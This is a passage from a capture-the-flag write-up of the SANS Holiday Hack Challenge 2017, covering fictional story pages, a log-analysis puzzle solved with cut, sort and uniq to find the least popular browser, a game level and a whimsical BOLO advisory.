&lt;p&gt;If we snoop around Alabaster's mailbox, we find this email:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;From:&lt;/strong&gt; &lt;a class="reference external" href="mailto:holly.evergreen&amp;#64;northpolechristmastown.com"&gt;holly.evergreen&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;To:&lt;/strong&gt; &lt;a class="reference external" href="mailto:all&amp;#64;northpolechristmastown.com"&gt;all&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Subject:&lt;/strong&gt; Lost book page&lt;/p&gt;
&lt;p&gt;Hey Santa,&lt;/p&gt;
&lt;p&gt;Found this lying around. Figured you needed it.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://mail.northpolechristmastown.com/attachments/GreatBookPage4_893jt91md2.pdf"&gt;http://mail.northpolechristmastown.com/attachments/GreatBookPage4_893jt91md2.pdf&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;:)&lt;/p&gt;
&lt;p&gt;-Holly&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We get a link to the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2017/GreatBookPage4_893jt91md2.pdf"&gt;fourth page of The Great Book&lt;/a&gt;
(sha256: &lt;code&gt;6afe9f8c7dc8a392b6d853a05f1c1ce67b490633e3aa6c22faa3b1936f1ceed0&lt;/code&gt;):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Rise of the Lollipop Guild&lt;/p&gt;
&lt;p&gt;As tensions escalated immediately before The Great Schism, outright
fistfights erupted in the streets of the Emerald City as the most
radicalized Elves and Munchkins battled for turf. In those early days, the
small-scale skirmishes were disorganized and chaotic. But as hostilities
and violence continued to grow, organized groups of elite fighters emerged
on each side to take control of the militias. One particularly notherworthy
band of commandos named itself the &amp;quot;Lollipop Guild&amp;quot;.&lt;/p&gt;
&lt;p&gt;Today, despite its sweet candy-themed name, the Guild's mission is by no
means sugar coated. The official, stated focus of this liliputian force is
to apply elite military tactics to defend Oz against all Elven aggression.
What's more, it's also believed (at least among the Elves) that the
Lollipop Guild engages in offensive operations against the North Pole, both
from a cyber and kinetic perspective. The Elves consider the Lollipop Guild
to be a terrorist organization. Indeed, the North Pole Elven Blue Team
toils year-round defending the computer and network infrastructure of the
North Pole from attack. Their biggest fear is that the Lollipop Guild will
somehow disrupt or destroy the North Pole's biggest production of the year
- Santa's Christmas Day present delivery operation. The North Pole Blue
Team is on extremely high alert throughout Christmas Eve, and exhaustive
period of analysis and active defense this team refers to as &amp;quot;Blue
Christmas&amp;quot;.&lt;/p&gt;
&lt;p&gt;Although it has never been proven, the Elves allege that the Lollipop Guild
has infiltrated its operatives among the North Pole population, cleverly
disguising these nefarious interlopers as Elves. According to these rumors,
so-called Munchkin Moles mingle among even the Elven Elite. Because Elves
and Munchkins look identical, Elven leadership remains confounded about
whether Munchkin Moles actually exist. Yet, rumors persist.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="fifth-page-of-the-great-book"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id39"&gt;Fifth page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The fifth page is located in North Pole and Beyond level. We must use the
giant falling snowball to collect it. But let's solve the Cranberry Pi
challenge first.&lt;/p&gt;
&lt;div class="section" id="north-pole-and-beyond-bumbles-bounce"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id40"&gt;North Pole and Beyond: Bumbles Bounce&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="id8"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id41"&gt;Cranberry Pi&lt;/a&gt;&lt;/h4&gt;
&lt;pre class="literal-block"&gt;
                           ._    _.
                           (_)  (_)                  &amp;lt;&amp;gt; \  / &amp;lt;&amp;gt;
                            .\::/.                   \_\/  \/_/
           .:.          _.=._\\//_.=._                  \\//
      ..   \o/   ..      '=' //\\ '='             _&amp;lt;&amp;gt;_\_\&amp;lt;&amp;gt;/_/_&amp;lt;&amp;gt;_
      :o|   |   |o:         '/::\'                 &amp;lt;&amp;gt; / /&amp;lt;&amp;gt;\ \ &amp;lt;&amp;gt;
       ~ '. ' .' ~         (_)  (_)      _    _       _ //\\ _
           &amp;gt;O&amp;lt;             '      '     /_/  \_\     / /\  /\ \
       _ .' . '. _                        \\//       &amp;lt;&amp;gt; /  \ &amp;lt;&amp;gt;
      :o|   |   |o:                   /\_\\&amp;gt;&amp;lt;//_/\
      ''   /o\   ''     '.|  |.'      \/ //&amp;gt;&amp;lt;\\ \/
           ':'        . ~~\  /~~ .       _//\\_
jgs                   _\_._\/_._/_      \_\  /_/
                       / ' /\ ' \                   \o/
       o              ' __/  \__ '              _o/.:|:.\o_
  o    :    o         ' .'|  |'.                  .\:|:/.
    '.\'/.'                 .                 -=&amp;gt;&amp;gt;::&amp;gt;o&amp;lt;::&amp;lt;&amp;lt;=-
    :-&amp;gt;&amp;#64;&amp;lt;-:                 :                   _ '/:|:\' _
    .'/.\'.           '.___/*\___.'              o\':|:'/o
  o    :    o           \* \ / */                   /o\
       o                 &amp;gt;--X--&amp;lt;
                        /*_/ \_*\
                      .'   \*/   '.
                            :
                            '
Minty Candycane here, I need your help straight away.
We're having an argument about browser popularity stray.
Use the supplied log file from our server in the North Pole.
Identifying the least-popular browser is your noteworthy goal.
&lt;/pre&gt;
&lt;p&gt;Alright, it seems we just have to analyze and find the least popular browser
in a log file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7283fcc58ff6:~$&lt;/span&gt; ls -lh
&lt;span class="go"&gt;total 29M&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 root root  24M Dec  4 17:11 access.log&lt;/span&gt;
&lt;span class="go"&gt;-rwxr-xr-x 1 root root 5.0M Dec 11 17:31 runtoanswer&lt;/span&gt;
&lt;span class="gp"&gt;elf@7283fcc58ff6:~$&lt;/span&gt; head access.log
&lt;span class="go"&gt;XX.YY.66.201 - - [19/Nov/2017:06:50:30 -0500] &amp;quot;GET /robots.txt HTTP/1.1&amp;quot; 301 185 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;XX.YY.66.201 - - [19/Nov/2017:06:50:30 -0500] &amp;quot;GET /robots.txt HTTP/1.1&amp;quot; 404 5 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;XX.YY.89.151 - - [19/Nov/2017:07:13:03 -0500] &amp;quot;GET /img/common/apple-touch-icon-57x57.png HTTP/1.1&amp;quot; 200 3677 &amp;quot;-&amp;quot; &amp;quot;Slack-ImgProxy (+https://api.slack.com/robots)&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;XX.YY.66.201 - - [19/Nov/2017:07:22:12 -0500] &amp;quot;GET / HTTP/1.1&amp;quot; 301 185 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;XX.YY.45.77 - - [19/Nov/2017:07:43:08 -0500] &amp;quot;GET /img/common/apple-touch-icon-57x57.png HTTP/1.1&amp;quot; 200 3677 &amp;quot;-&amp;quot; &amp;quot;Slack-ImgProxy (+https://api.slack.com/robots)&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;XX.YY.201.12 - - [19/Nov/2017:08:21:10 -0500] &amp;quot;GET /manager/html HTTP/1.1&amp;quot; 301 185 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;XX.YY.218.124 - - [19/Nov/2017:08:22:09 -0500] &amp;quot;GET /img/common/favicon-128.png HTTP/1.1&amp;quot; 304 0 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;XX.YY.68.152 - - [19/Nov/2017:08:43:27 -0500] &amp;quot;GET /img/common/apple-touch-icon-57x57.png HTTP/1.1&amp;quot; 200 3677 &amp;quot;-&amp;quot; &amp;quot;Slack-ImgProxy (+https://api.slack.com/robots)&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;XX.YY.236.170 - - [19/Nov/2017:08:48:39 -0500] &amp;quot;GET /img/common/apple-touch-icon-57x57.png HTTP/1.1&amp;quot; 200 3677 &amp;quot;-&amp;quot; &amp;quot;slack/2.47.0.7352 (motorola Moto G (4); Android 7.0)&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;XX.YY.11.135 - - [19/Nov/2017:08:56:32 -0500] &amp;quot;GET / HTTP/1.1&amp;quot; 304 0 &amp;quot;-&amp;quot; &amp;quot;Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the last column holds the user-agent. We can also observe that
the user-agent is just after the fifth double-quote on the line. So, if we use
the &lt;code&gt;cut&lt;/code&gt; command, with &lt;code&gt;&amp;quot;&lt;/code&gt; as a separator, we will get the
user-agent by asking for the sixth field:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7283fcc58ff6:~$&lt;/span&gt; cut -d&lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;#39;&lt;/span&gt; -f &lt;span class="m"&gt;6&lt;/span&gt; access.log
&lt;span class="go"&gt;Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)&lt;/span&gt;
&lt;span class="go"&gt;Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)&lt;/span&gt;
&lt;span class="go"&gt;Slack-ImgProxy (+https://api.slack.com/robots)&lt;/span&gt;
&lt;span class="go"&gt;Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)&lt;/span&gt;
&lt;span class="go"&gt;Slack-ImgProxy (+https://api.slack.com/robots)&lt;/span&gt;
&lt;span class="go"&gt;Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)&lt;/span&gt;
&lt;span class="go"&gt;Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0&lt;/span&gt;
&lt;span class="go"&gt;Slack-ImgProxy (+https://api.slack.com/robots)&lt;/span&gt;
&lt;span class="go"&gt;slack/2.47.0.7352 (motorola Moto G (4); Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, now that we have only the user-agents, we can &lt;code&gt;sort&lt;/code&gt; the
user-agents, and use &lt;code&gt;uniq&lt;/code&gt; to  remove duplicates, and count the number
of unique user-agents:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7283fcc58ff6:~$&lt;/span&gt; cut -d&lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;#39;&lt;/span&gt; -f &lt;span class="m"&gt;6&lt;/span&gt; access.log  &lt;span class="p"&gt;|&lt;/span&gt; sort &lt;span class="p"&gt;|&lt;/span&gt; uniq -c
&lt;span class="go"&gt;      2 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;    143 -&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      1 Dillo/3.0.5&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;      3 GarlikCrawler/1.2 (http://garlik.com/, crawler@garlik.com)&lt;/span&gt;
&lt;span class="go"&gt;     34 Googlebot-Image/1.0&lt;/span&gt;
&lt;span class="go"&gt;      3 MobileSafari/604.1 CFNetwork/889.9 Darwin/17.2.0&lt;/span&gt;
&lt;span class="go"&gt;      4 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&lt;/span&gt;
&lt;span class="go"&gt;      8 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)&lt;/span&gt;
&lt;span class="go"&gt;    345 Mozilla/4.0 (compatible;)&lt;/span&gt;
&lt;span class="go"&gt;      2 Mozilla/5.0&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, &lt;code&gt;Dillo/3.0.5&lt;/code&gt; seems to be the least popular web-browser, with only
one entry. However, there may be other user-agents with only one hit in the
log file. Let's sort our counted output:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7283fcc58ff6:~$&lt;/span&gt; cut -d&lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;#39;&lt;/span&gt; -f &lt;span class="m"&gt;6&lt;/span&gt; access.log  &lt;span class="p"&gt;|&lt;/span&gt; sort &lt;span class="p"&gt;|&lt;/span&gt; uniq -c &lt;span class="p"&gt;|&lt;/span&gt; sort -gr
&lt;span class="go"&gt;  27285 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;   8501 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;   6221 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0&lt;/span&gt;
&lt;span class="go"&gt;   6183 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;   3163 Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko&lt;/span&gt;
&lt;span class="go"&gt;   2733 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.94 Chrome/62.0.3202.94 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;   2427 Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0&lt;/span&gt;
&lt;span class="go"&gt;   2099 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;   2006 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;   2002 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;      2 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (samsung SM-G955F; Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (samsung SM-G950U; Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (samsung SM-G935T; Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (samsung SM-G935L; Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (samsung SM-G930F; Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (samsung SM-G920P; Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (motorola XT1635-02; Android 7.1.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (motorola Moto G (5) Plus; Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (Xiaomi Redmi Note 4; Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.46.0.7100 (lenovo Lenovo K8 Note; Android 7.1.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (OnePlus ONEPLUS A3000; Android 7.1.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (OnePlus ONE A2003; Android 8.0.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (LYF LS-5504; Android 5.1.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (Intex Cloud Q11 4G; Android 6.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (Huawei Nexus 6P; Android 8.0.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (HUAWEI AGS-W09; Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.1.7358 (Google Pixel XL; Android 8.0.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.0.7352 (samsung SM-N950U; Android 7.1.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.0.7352 (samsung SAMSUNG-SM-N910A; Android 6.0.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.0.7352 (samsung SAMSUNG-SM-G870A; Android 6.0.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.0.7352 (motorola Moto G (4); Android 7.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.0.7352 (Sony F8331; Android 7.1.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.0.7352 (OnePlus ONEPLUS A3003; Android 7.1.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.0.7352 (OnePlus A0001; Android 7.1.2)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.0.7352 (LGE Nexus 5; Android 6.0.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.47.0.7352 (Google Pixel; Android 8.0.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.46.0.7100 (lenovo Lenovo K8 Note; Android 7.1.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.46.0.7100 (Wingtech 2014818; Android 7.1.2)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.46.0.7100 (OnePlus ONE E1003; Android 6.0.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 slack/2.46.0.7100 (OnePlus ONE A2003; Android 6.0.1)&lt;/span&gt;
&lt;span class="go"&gt;      1 masscan/1.0 (https://github.com/robertdavidgraham/masscan)&lt;/span&gt;
&lt;span class="go"&gt;      1 masscan/1.0&lt;/span&gt;
&lt;span class="go"&gt;      1 curl/7.35.0&lt;/span&gt;
&lt;span class="go"&gt;      1 Slack/370354 CFNetwork/893.14 Darwin/17.3.0&lt;/span&gt;
&lt;span class="go"&gt;      1 Slack/370354 CFNetwork/893.10 Darwin/17.3.0&lt;/span&gt;
&lt;span class="go"&gt;      1 Slack/370342 CFNetwork/808.3 Darwin/16.3.0&lt;/span&gt;
&lt;span class="go"&gt;      1 Slack/370136 CFNetwork/811.5.4 Darwin/16.7.0&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; Touch; MASEJS)&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; MASMJS)&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (X11; OpenBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko)&lt;/span&gt;
&lt;span class="go"&gt;      1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;      1 Dillo/3.0.5&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Well, even though some other user-agents have only one hit, they seem to be
different versions of the same browser. &lt;code&gt;Dillo/3.0.5&lt;/code&gt; seems to be our
winner:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7283fcc58ff6:~$&lt;/span&gt; ./runtoanswer
&lt;span class="go"&gt;Starting up, please wait......&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Enter the name of the least popular browser in the web log: Dillo/3.0.5&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;That is the least common browser in the web log! Congratulations!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id9"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id42"&gt;Redirecting the snowball&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Now that we found the least popular browser, we get a new object: the Bumper,
which can redirect the snowball.&lt;/p&gt;
&lt;img alt="bumbles_bounce_terminal.png" class="align-center" src="/images/sans-christmas-challenge-2017/bumbles_bounce_terminal.png" /&gt;
&lt;p&gt;Now here's the layout I used to redirect the snowball. Incidently, I learned
that the Jam slows the snowball down, because it's sticky:&lt;/p&gt;
&lt;img alt="bumbles_bounce_snowball.gif" class="align-center" src="/images/sans-christmas-challenge-2017/bumbles_bounce_snowball.gif" /&gt;
&lt;p&gt;This level had the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2017/GreatBookPage5.pdf"&gt;fifth page to The Great Book&lt;/a&gt; (sha256: &lt;code&gt;aed664454f956ed4f80c54540c4980ae28912c3ff816733a6fb84b366bd32c67&lt;/code&gt;):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Abominable Snow Monster&lt;/p&gt;
&lt;p&gt;When the Elves and reindeer refugees first arrived at the North Pole, they
found a barren but workable landscape. The desolate peace of the cold North
was a welcomed change from the bitter battles with the Munchkins back in
Oz. Dressed up like Eskimos for their first several months, all elves from
one to ninety-two worked without interruption building homes for
themselves, stalls for the reindeer, toy production lines, and finally a
splendid castle for Santa.&lt;/p&gt;
&lt;p&gt;But then, it started. Some of their food stocks mysteriously disappeared.
Initially, the Elves hypothesized that Munchkins Moles were pilfering their
provisions, so they embarked on a detailed investigation. Sadly, the
taskforce found very little evidence, except for MASSIVE footprints in the
snow near the food storage bins.&lt;/p&gt;
&lt;p&gt;And then, it got worse. Elves started disappearing. One at a time, over the
space of a couple of weeks, a half dozen elves simply vanished, their last
known location surrounded by more gigantic footprints.&lt;/p&gt;
&lt;p&gt;The taskforce bravely followed the footprints back to an enormous cave,
where they found a gigantic furry beast with horrible fangs. The so-called
&amp;quot;Abominable Snow Monster&amp;quot; had enslaved the kidnapped elves, forcing them
to make gigantic snowballs he could throw as weapons. After mounting a
daring rescue operation, the Elves vowed to steer clear of the entire
region inhabited by the Abominable.&lt;/p&gt;
&lt;p&gt;In later years, through the tireless efforts of social worker and arctic
prospector Yukon Cornelius, a miracle occurred! The Abominable actually
became a jolly, happy soul, who could laugh and play. The Elves welcomed
the newly friendly beast and started calling him &amp;quot;Bumble&amp;quot; as he earned a
job putting Christmas tree toppers into place without a stepladder.&lt;/p&gt;
&lt;p&gt;Very recently, though, the Bumble's behaviour has become quite erratic.
Several times every day, his eyes seem to go blank as he stares off into
the distance. Rumor among the elves is that there must have been some
magic in something the Bumble ate. As of this writing, the Bumble is under
careful analysis by Yukon Cornelius and the North Pole's best
veterinarians. A diagnosis remains elusive.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;After solving this challenge, we have a little chat with Sam the Snowman:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Bumble:&lt;/strong&gt; Arrrrrrrrgh! Grrrrrrrr! ROOOOOOOAR!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sam the Snowman:&lt;/strong&gt; You've done it! You found out who was throwing the
giant snowballs! It was the Abominable Snow Monster. We should have known.
Thank you for your great work!&lt;/p&gt;
&lt;p&gt;But, you know, he doesn't seem quite himself. Look into his eyes. It almost
looks like he has been hypnotized. Something's not right with him.&lt;/p&gt;
&lt;p&gt;In fact, he seems to be under someone else's control. We've got to find out
who is pulling his strings, or else the real villain will remain on the
loose and will likely strike again.&lt;/p&gt;
&lt;p&gt;It means, buckle your seatbelt, dear player, because the North Pole is
going bye-bye.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="north-pole-christmas-town-infrastructure-north-pole-police-department-web-site"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id43"&gt;North Pole Christmas Town infrastructure: North Pole Police Department web site&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;In the fourth page, we learned the existence of Munchkin moles, that try to
pass for Elves in order to spy on them. Let's try to learn more about these
Munchkin moles!&lt;/p&gt;
&lt;p&gt;If we take a look back at the documents we found on the SMB server, there is
one called &amp;quot;BOLO - Munchkin Mole Report.docx&amp;quot;. This is the content:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;BOLO: Munchkin Mole Advisory&lt;/p&gt;
&lt;p&gt;Please be advised that the long-rumored munchkin moles are now believed to
be real.  After a detailed and thorough investigation, North Pole
Authorities have identified two munchkins impersonating elves in Santa's
workshop.&lt;/p&gt;
&lt;p&gt;When confronted, both munchkins were able to evade elf authorities after
throwing rocks and engaging in aggravated hair pulling. The pair
mysteriously disappeared after speaking an unknown word sounding like
&amp;quot;puuurzgexgull.&amp;quot;&lt;/p&gt;
&lt;p&gt;Munchkin Descriptions&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Name&lt;/strong&gt;: Boq Questrian&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Height&lt;/strong&gt;: Approximately 4 feet&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Weight&lt;/strong&gt;: Unknown&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Appearance&lt;/strong&gt;: Reddish skin tone, blue eyes. A single curl of hair
dominates an otherwise unremarkable hairstyle.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Warning&lt;/strong&gt;: Boq is uncannily accurate at short-distance rock throwing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Name&lt;/strong&gt;: Bini Aru&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Height&lt;/strong&gt;: Approximately 4 feet&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Weight&lt;/strong&gt;: Unknown&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Appearance&lt;/strong&gt;: Pale skin, grey eyes. Unruly black hair.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Warning&lt;/strong&gt;: Bini is unrelenting in hair pulling.&lt;/p&gt;
&lt;p&gt;If you see these munchkin moles, do not attempt to detain or apprehend
them. Contact the North Pole Police Department for assistance.&lt;/p&gt;
&lt;p&gt;For more information visit &lt;a class="reference external" href="https://nppd.northpolechristmastown.com"&gt;https://nppd.northpolechristmastown.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Merry Christmas!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, two Munchkin moles were identified, Boq Questrian and Bini Aru. But there
may be more. Let's try and use the North Pole Police Department's website
to identify potential moles.&lt;/p&gt;
&lt;p&gt;The &lt;a class="reference external" href="https://nppd.northpolechristmastown.com"&gt;North Pole Police Department's website&lt;/a&gt;
